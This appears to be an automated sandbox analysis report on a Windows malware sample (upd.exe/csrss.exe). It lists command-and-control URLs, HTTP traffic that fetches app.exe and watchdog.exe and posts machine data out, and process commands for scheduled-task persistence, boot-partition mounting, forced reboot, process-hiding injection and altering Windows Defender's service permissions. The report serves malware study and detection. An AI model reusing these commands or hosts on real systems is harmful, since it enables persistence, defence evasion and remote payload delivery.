        Source: upd.exe, csrss.exeString found in binary or memory: lla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)2695994666715063979466701508701962594045780771442439172168272236806126959946667150639794667015087019630673557916260026308143510066 equals www.facebook.com (Facebook)
        Source: upd.exe, csrss.exeString found in binary or memory: http://archive.org/details/archive.org_bot)Mozilla/5.0
        Source: upd.exe, csrss.exeString found in binary or memory: http://builtwith.com/biup)
        Source: upd.exe.0.drString found in binary or memory: http://crl.g
        Source: upd.exe, 00000005.00000002.321059486.00000000009FB000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349015905.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.563763292.00000000009FB000.00000040.00020000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
        Source: upd.exe, 00000005.00000002.321059486.00000000009FB000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349015905.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.563763292.00000000009FB000.00000040.00020000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
        Source: upd.exe, 00000005.00000002.321059486.00000000009FB000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349015905.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.563763292.00000000009FB000.00000040.00020000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
        Source: svchost.exe, 0000001F.00000002.434211231.000002A198900000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: svchost.exe, 0000001F.00000002.434211231.000002A198900000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
        Source: upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
        Source: upd.exe, csrss.exeString found in binary or memory: http://gais.cs.ccu.edu.tw/robot.php)Gulper
        Source: csrss.exe, 0000000B.00000002.568303341.00000000119AA000.00000004.00000001.sdmp, Null.11.drString found in binary or memory: http://gohnot.com/d28daa3fb329cff58b19acdf478b7882
        Source: 0NlSa5bf55.exe, 00000000.00000002.313848817.000000001140C000.00000004.00000001.sdmpString found in binary or memory: http://gohnot.com/d28daa3fb329cff58b19acdf478b7882/app.exe
        Source: csrss.exe, 0000000B.00000003.410949738.0000000011936000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000003.410362846.00000000119AE000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000003.412650413.0000000011864000.00000004.00000001.sdmp, Null.11.drString found in binary or memory: http://gohnot.com/d28daa3fb329cff58b19acdf478b7882/watchdog.exe
        Source: 0NlSa5bf55.exe, 00000000.00000002.313848817.000000001140C000.00000004.00000001.sdmpString found in binary or memory: http://gohnot.com/d28daa3fb329cff58b19acdf478b7882:s
        Source: upd.exe, csrss.exeString found in binary or memory: http://grub.org)Mozilla/5.0
        Source: svchost.exe, 0000001F.00000003.409018705.000002A19897E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.408832984.000002A198990000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
        Source: upd.exe, csrss.exeString found in binary or memory: http://help.ya
        Source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmpString found in binary or memory: http://https://_bad_pdb_file.pdb
        Source: upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna:
        Source: upd.exe, csrss.exeString found in binary or memory: http://misc.yahoo.com.cn/he
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://newscommer.com/app/app.exe
        Source: svchost.exe, 0000000A.00000002.352136565.000001E387E7D000.00000004.00000001.sdmpString found in binary or memory: http://schemas.microsoft
        Source: upd.exe, csrss.exeString found in binary or memory: http://search.msn.com/msnb
        Source: upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)msnbot/1.1
        Source: csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)net/http:
        Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)pkcs7:
        Source: upd.exe, csrss.exeString found in binary or memory: http://www.alexa.com/help/webmasters;
        Source: upd.exe, csrss.exeString found in binary or memory: http://www.archive.org/details/archive.org_bot)Opera/9.80
        Source: upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://www.avantbrowser.com)MOT-V9mm/00.62
        Source: upd.exe, csrss.exeString found in binary or memory: http://www.baidu.com/search/spide
        Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4
        Source: upd.exe, csrss.exeString found in binary or memory: http://www.bloglines.com)F
        Source: upd.exe, csrss.exeString found in binary or memory: http://www.everyfeed.c
        Source: upd.exe, csrss.exeString found in binary or memory: http://www.exabot.com/go/robot)Opera/9.80
        Source: upd.exe, csrss.exeString found in binary or memory: http://www.google.com/adsbot.html)Encountered
        Source: csrss.exeString found in binary or memory: http://www.google.com/bot.html)Mozilla/5.0
        Source: upd.exe, csrss.exeString found in binary or memory: http://www.google.com/bot.html)tls:
        Source: upd.exe, csrss.exeString found in binary or memory: http://www.google.com/feedfetcher.html)HKLM
        Source: upd.exe, csrss.exeString found in binary or memory: http://www.googlebot.com/bot.html)Links
        Source: upd.exe, csrss.exeString found in binary or memory: http://www.spidersoft.com)Wget/1.9
        Source: upd.exe, csrss.exeString found in binary or memory: http://yandex.com/bots)Opera/9.51
        Source: upd.exe, csrss.exeString found in binary or memory: http://yandex.com/bots)Opera/9.80
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpString found in binary or memory: https://blockchain.infoindex
        Source: svchost.exe, 0000001F.00000003.409018705.000002A19897E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.408832984.000002A198990000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
        Source: upd.exe, csrss.exeString found in binary or memory: https://humisnee.com/sbmstart.phpindefinite
        Source: csrss.exe, 0000000B.00000003.412056794.00000000118BE000.00000004.00000001.sdmpString found in binary or memory: https://logs.trumops.com
        Source: csrss.exe, 0000000B.00000003.412056794.00000000118BE000.00000004.00000001.sdmpString found in binary or memory: https://logs.trumops.comhttps://runmodes.com/api/loghttps://server2.trumops.com
        Source: upd.exe, csrss.exeString found in binary or memory: https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsontls:
        Source: upd.exe, 00000005.00000002.323505653.00000000118BA000.00000004.00000001.sdmp, upd.exe, 00000008.00000002.351385142.0000000011810000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000002.566919363.0000000011804000.00000004.00000001.sdmpString found in binary or memory: https://retoti.com
        Source: upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpString found in binary or memory: https://retoti.comidentifier
        Source: csrss.exe, 0000000B.00000003.412084318.00000000118C6000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000003.412056794.00000000118BE000.00000004.00000001.sdmp, Null.11.drString found in binary or memory: https://runmodes.com/api/log
        Source: csrss.exe, 0000000B.00000003.411869472.00000000118D6000.00000004.00000001.sdmpString found in binary or memory: https://runmodes.com/api/log442b90d2-fde4-485f-a003-6086e2191d6e.uuid.trumops.com
        Source: csrss.exe, 0000000B.00000002.567515603.00000000118BE000.00000004.00000001.sdmpString found in binary or memory: https://runmodes.com/api/logMachineGuidServiceVersionarch=64&build_number=17134&ec%3Af4%3Abb%3A86%3A
        Source: 0NlSa5bf55.exe, 0NlSa5bf55.exe, 00000000.00000002.310849116.0000000000401000.00000040.00020000.sdmpString found in binary or memory: https://runmodes.com/api/loginvalid
        Source: 0NlSa5bf55.exe, 00000000.00000003.302106289.00000000114E2000.00000004.00000001.sdmp, 0NlSa5bf55.exe, 00000000.00000002.314895164.00000000114C0000.00000004.00000001.sdmp, 0NlSa5bf55.exe, 00000000.00000003.301759199.00000000115C2000.00000004.00000001.sdmpString found in binary or memory: https://server16.trumops.com
        Source: 0NlSa5bf55.exe, 00000000.00000003.302123774.00000000114D6000.00000004.00000001.sdmpString found in binary or memory: https://server16.trumops.com/api/cdn?c=dfd675dbadcd07bb&kind=main&uuid=
        Source: 0NlSa5bf55.exe, 00000000.00000002.314895164.00000000114C0000.00000004.00000001.sdmpString found in binary or memory: https://server16.trumops.comc=dfd675dbadcd07bb&kind=main&server16.trumops.com:443server16.trumops.co
        Source: csrss.exe, 0000000B.00000003.412084318.00000000118C6000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000003.412056794.00000000118BE000.00000004.00000001.sdmp, Null.11.drString found in binary or memory: https://server2.trumops.com
        Source: csrss.exe, 0000000B.00000003.410338670.00000000119DE000.00000004.00000001.sdmpString found in binary or memory: https://server2.trumops.com/api/cdn?c=fa2e76e6e1aa03da&uuid=442b90d2-fde4-485f-a003-6086e2191d6e
        Source: csrss.exe, 0000000B.00000002.567910236.0000000011926000.00000004.00000001.sdmpString found in binary or memory: https://server2.trumops.com/api/poll
        Source: csrss.exe, 0000000B.00000002.567910236.0000000011926000.00000004.00000001.sdmpString found in binary or memory: https://server2.trumops.com/api/pollE
        Source: csrss.exe, 0000000B.00000002.567910236.0000000011926000.00000004.00000001.sdmpString found in binary or memory: https://server2.trumops.com/api/pollserver2.trumops.com
        Source: csrss.exe, 0000000B.00000003.410338670.00000000119DE000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000002.568351371.00000000119DE000.00000004.00000001.sdmpString found in binary or memory: https://server2.trumops.com/bots/post-ia-data?uuid=442b90d2-fde4-485f-a003-6086e2191d6e
        Source: csrss.exe, 0000000B.00000002.568492280.0000000011A78000.00000004.00000001.sdmpString found in binary or memory: https://server2.trumops.comc=fa2e76e6e1aa03da&uuid=server2.trumops.com:443server2.trumops.com:443tcp
        Source: csrss.exe, 0000000B.00000002.567515603.00000000118BE000.00000004.00000001.sdmpString found in binary or memory: https://server2.trumops.comhttps://server2.trumops.comserver2.trumops.com:443ultserver2.trumops.com:
        Source: csrss.exe, 0000000B.00000003.410492385.00000000119AC000.00000004.00000001.sdmpString found in binary or memory: https://server2.trumops.comserver2.trumops.com:443server2.trumops.com:443tcpserver2.trumops.com
        Source: csrss.exe, 0000000B.00000002.568492280.0000000011A78000.00000004.00000001.sdmpString found in binary or memory: https://server2.trumops.comserver2.trumops.com:443server2.trumops.com:443tcpserver2.trumops.coma
        Source: upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpString found in binary or memory: https://sitescore.aiValue
        Source: csrss.exe, 0000000B.00000002.567045543.0000000011846000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000002.566919363.0000000011804000.00000004.00000001.sdmp, Null.11.drString found in binary or memory: https://trumops.com
        Source: upd.exe, csrss.exeString found in binary or memory: https://trumops.com/api/install-failureinvalid
        Source: upd.exe, 00000005.00000002.323457865.00000000118AE000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comServiceVersionServiceVersionServersVersionServersVersionDistributorIDCampaignIDOS
        Source: upd.exe, 00000005.00000002.323617755.00000000118CE000.00000004.00000001.sdmp, upd.exe, 00000005.00000002.323544402.00000000118BE000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comhttps://retoti.comS-1-5-21-3853321935-2125563209-4053062332-1002
        Source: upd.exe, 00000005.00000002.323505653.00000000118BA000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comFirstInstallDateFirstInsta
        Source: upd.exe, 00000008.00000002.351356403.000000001180A000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comS-1-5-21-3853321935-212556
        Source: csrss.exe, 0000000B.00000002.566919363.0000000011804000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comhttps://retoti.commusnotifyicon.exeRuntimeBroker.exersionruntimebroker.exeSgrmBro
        Source: 0NlSa5bf55.exe, 0NlSa5bf55.exe, 00000000.00000002.310849116.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpString found in binary or memory: https://trumops.comif-unmodified-sinceillegal
        Source: upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpString found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)gentraceback
        Source: svchost.exe, 0000001F.00000003.409018705.000002A19897E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.408832984.000002A198990000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
        Source: svchost.exe, 0000001F.00000003.409018705.000002A19897E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.408832984.000002A198990000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
        Source: svchost.exe, 0000001F.00000003.410486166.000002A198986000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/
        Source: svchost.exe, 0000001F.00000003.410443706.000002A1989AE000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.410486166.000002A198986000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
        Source: unknownHTTP traffic detected: POST /api/log HTTP/1.1Host: runmodes.comUser-Agent: Go-http-client/1.1Content-Length: 192Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip
        Source: unknownDNS traffic detected: queries for: runmodes.com
        Source: global trafficHTTP traffic detected: GET /api/cdn?c=dfd675dbadcd07bb&kind=main&uuid= HTTP/1.1Host: server16.trumops.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
        Source: global trafficHTTP traffic detected: GET /api/cdn?c=fa2e76e6e1aa03da&uuid=442b90d2-fde4-485f-a003-6086e2191d6e HTTP/1.1Host: server2.trumops.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
        Source: global trafficHTTP traffic detected: GET /d28daa3fb329cff58b19acdf478b7882/app.exe HTTP/1.1Host: gohnot.comUser-Agent: Go-http-client/1.1Uuid: Accept-Encoding: gzip
        Source: global trafficHTTP traffic detected: GET /d28daa3fb329cff58b19acdf478b7882/watchdog.exe HTTP/1.1Host: gohnot.comUser-Agent: Go-http-client/1.1Uuid: 442b90d2-fde4-485f-a003-6086e2191d6eVersion: 183Accept-Encoding: gzip
        Source: upd.exe, 00000005.00000002.321801363.0000000000FE8000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

        System Summary:

        barindex
        Uses shutdown.exe to shutdown or reboot the systemShow sources
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
        Source: 0NlSa5bf55.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, RELOCS_STRIPPED
        Source: 5.2.upd.exe.9ad080.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
        Source: 8.2.upd.exe.9af2e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
        Source: 8.2.upd.exe.9a76e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
        Source: 8.2.upd.exe.9ad080.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
        Source: 11.2.csrss.exe.9ad080.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
        Source: 11.2.csrss.exe.9a76e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
        Source: 5.2.upd.exe.9af2e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
        Source: 5.2.upd.exe.9a76e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
        Source: 11.2.csrss.exe.9af2e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
        Source: C:\Users\user\Desktop\upd.exeFile created: C:\Windows\rssJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019B27F0
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019D8A4C
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019CC25C
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019B41F0
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019C7950
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019DA174
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019D74FC
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019D03B0
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019D5C10
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019B3370
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019C8549
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019CD558
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019CF908
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019D48D8
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019C58EC
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019C8040
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019C4830
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019D2864
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019CF070
        Source: EfiGuardDxe.efi.11.drStatic PE information: No import functions for PE file found
        Source: bootmgfw.efi.11.drStatic PE information: No import functions for PE file found
        Source: bootx64.efi.11.drStatic PE information: No import functions for PE file found
        Source: C:\Windows\SysWOW64\sc.exeProcess token adjusted: Security
        Source: 0NlSa5bf55.exeVirustotal: Detection: 66%
        Source: 0NlSa5bf55.exeReversingLabs: Detection: 64%
        Source: C:\Users\user\Desktop\0NlSa5bf55.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Users\user\Desktop\0NlSa5bf55.exe "C:\Users\user\Desktop\0NlSa5bf55.exe"
        Source: C:\Users\user\Desktop\0NlSa5bf55.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\0NlSa5bf55.exeProcess created: C:\Users\user\Desktop\upd.exe C:\Users\user\Desktop\upd.exe -update
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
        Source: unknownProcess created: C:\Windows\servicing\TrustedInstaller.exe C:\Windows\servicing\TrustedInstaller.exe
        Source: C:\Users\user\Desktop\upd.exeProcess created: C:\Users\user\Desktop\upd.exe "C:\Users\user\Desktop\upd.exe" -update
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
        Source: C:\Users\user\Desktop\upd.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn ScheduledUpdate /f
        Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
        Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
        Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
        Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
        Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
        Source: C:\Windows\SysWOW64\shutdown.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\windefender.exe C:\Windows\windefender.exe
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\windefender.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\windefender.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        Source: unknownProcess created: C:\Windows\windefender.exe C:\Windows\windefender.exe
        Source: C:\Users\user\Desktop\0NlSa5bf55.exeProcess created: C:\Users\user\Desktop\upd.exe C:\Users\user\Desktop\upd.exe -update
        Source: C:\Users\user\Desktop\upd.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        Source: C:\Windows\windefender.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        Source: C:\Users\user\Desktop\upd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32
